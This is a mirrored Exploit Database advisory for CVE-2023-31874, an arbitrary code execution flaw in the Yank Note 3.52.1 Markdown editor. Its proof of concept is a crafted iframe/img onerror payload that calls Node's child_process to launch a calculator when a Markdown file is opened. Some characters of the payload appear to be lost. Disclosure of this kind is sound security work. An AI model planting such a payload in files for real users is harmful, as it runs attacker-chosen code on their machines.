Yank Note v3.52.1 (Electron) – Arbitrary Code Execution

• Exploit Database
• 41 阅读

• 作者： 8bitsec
  日期： 2023-05-23
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51470/

• # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
  # Date: 2023-04-27
  # Exploit Author: 8bitsec
  # CVE: CVE-2023-31874
  # Vendor Homepage: yank-note.com
  # Software Link: https://github.com/purocean/yn
  # Version: 3.52.1
  # Tested on: [Ubuntu 22.04 | Mac OS 13]
  
  Release Date: 2023-04-27
  
  Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
  
  Technical Details & Description:
  
  A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
  
  Proof of Concept (PoC):
  Arbitrary code execution:
  
  Create a markdown file (.md) in any text editor and write the following payload.
  Mac:
  <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
  
  Ubuntu:
  <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
  
  Opening the file in Yank Note will auto execute the Calculator application.